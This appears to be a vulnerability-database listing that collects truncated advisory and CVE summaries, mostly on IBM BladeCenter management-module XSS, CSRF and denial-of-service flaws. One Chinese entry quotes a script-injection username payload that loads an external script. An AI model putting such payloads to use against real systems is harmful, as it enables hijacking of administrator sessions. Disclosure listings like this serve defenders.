Java Runtime CMM readMabCurveData Buffer Overflow

Added: 10/04/2010 CVE: CVE-2010-0838 BID: 39069 OSVDB: 63500 Background Oracle Java SE and Java for Business are development platforms for developing and deploying Java applications. They include the Java SE Development Kit JDK and the Java Runtime Environment JRE. The JRE provides the minimum...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities on the IBM BladeCenter with Advanced Management Module AMM firmware build ID BPET48L, and possibly other versions before 4.7 and 5.0, allow remote attackers to inject arbitrary web script or HTML via the 1 INDEX or 2 IPADDR parameter to...

IBM BladeCenter Management Module Cross Site Scripting / Directory Traversal

Digital Security Research Group DSecRG Advisory DSECRG-09-054 Application: IBM BladeCenter Managemet Module Versions Affected: BPET48L and may be other versions Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: XSS,Directory traversal, Information disclosure Exploits: YES Reported:...

Code injection

The IBM BladeCenter with Advanced Management Module AMM firmware before bpet50g does not properly perform interrupt sharing for USB and iSCSI, which allows remote attackers to cause a denial of service management module reboot via TCP packets with malformed application data...

CVE-2010-1460

The IBM BladeCenter with Advanced Management Module AMM firmware before bpet50g does not properly perform interrupt sharing for USB and iSCSI, which allows remote attackers to cause a denial of service management module reboot via TCP packets with malformed application data...

BladeCenter AMM Denial Of Service

Digital Security Research Group DSecRG Advisory DSECRG-09-049 Application: IBM BladeCenter Managmet Module Versions Affected: before BPET50G Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: DoS Exploits: YES Reported: 24.07.2009 Vendor response: 26.07.2009 Date of Public Advisory:...

IBM BladeCenter Management Module - DoS vulnerability

Exploit for hardware platform in category dos / poc ===================================================== IBM BladeCenter Management Module - DoS vulnerability ===================================================== DSECRG-09-049 IBM BladeCenter Management Module - DoS vulnerability Source:...

IBM Bladecenter Management Module - Denial of Service

DSECRG-09-049 IBM BladeCenter Management Module - DoS vulnerability Source: http://www.dsecrg.com/pages/vul/show.php?id=149 This device can be remotely rebooted by sending a malformed TCP packets Digital Security Research Group DSecRG Advisory DSECRG-09-049 Application: IBM BladeCenter Managmet...

IBM Bladecenter Management Module - Denial of Service

IBM Bladecenter Management Module - Denial of Service DSECRG-09-049 IBM BladeCenter Management Module - DoS vulnerability Source: http://www.dsecrg.com/pages/vul/show.php?id=149 This device can be remotely rebooted by sending a malformed TCP packets Digital Security Research Group DSecRG Advisory...

Using Flash upload loopholes to penetrate a server-vulnerability warning-the black bar safety net

Now a lot of sites in order to pursue the image, on the site home page using Flash rotate display, and some use the picture show;the site of the most core things content, in order to keep the site effect, and therefore will frequently update the picture or flash file in website background design...

Code injection

Multiple unspecified vulnerabilities in the Advanced Management Module firmware before 2.50G for the IBM BladeCenter T 8720-2xx and 8730-2xx have unknown impact and attack vectors...

CVE-2009-3935

CVE-2009-3935 affects the IBM BladeCenter T Advanced Management Module (AMM) firmware prior to version 2.50G (8720-2xx and 8730-2xx). The connected sources confirm multiple unspecified vulnerabilities with unknown impact and attack vectors; no concrete root cause, affected subcomponents, exploit ...

CVE-2009-1288

Multiple cross-site scripting XSS vulnerabilities in the Advanced Management Module AMM on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via 1 the username in a login action or 2 the PATH parameter to...

Code injection

private/login.ssi in the Advanced Management Module AMM on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allows remote attackers to discover the access roles and scopes of arbitrary user accounts via a modified WEBINDEX parameter...

Cross site request forgery (csrf)

Multiple cross-site request forgery CSRF vulnerabilities in the web administration interface in the Advanced Management Module AMM on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to hijack the authentication of administrators, as demonstrated by a...

CVE-2009-1288

Multiple cross-site scripting XSS vulnerabilities in the Advanced Management Module AMM on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via 1 the username in a login action or 2 the PATH parameter to...

CVE-2009-1288

The CVE-2009-1288 entry describes multiple cross-site scripting (XSS) vulnerabilities in IBM BladeCenter’s Advanced Management Module (AMM), including the BladeCenter H with BPET36H 54. The issues allow remote attackers to inject arbitrary web script or HTML via the username field during login or...

CVE-2009-1290

Multiple cross-site request forgery CSRF vulnerabilities in the web administration interface in the Advanced Management Module AMM on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to hijack the authentication of administrators, as demonstrated by a...

IBM BladeCenter高级管理模块跨站脚本和跨站请求伪造漏洞

BUGTRAQ ID: 34447 IBM BladeCenter是IBM的系列高性能刀片服务器。 IBM BladeCenter所使用的高级管理模块（AMM）的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话，AMM会在事件日志页面记录用户所提交的凭据，之后管理员查看事件日志时就会执行所注入的内容。例如，攻击者可以使用以下用户名登录导致注入 JavaScript： /scriptscript src="//l7.fi"/scriptscript...

IBM BladeCenter Advanced Management Module multiple security vulnerabilities

Crossite scripting, information leak...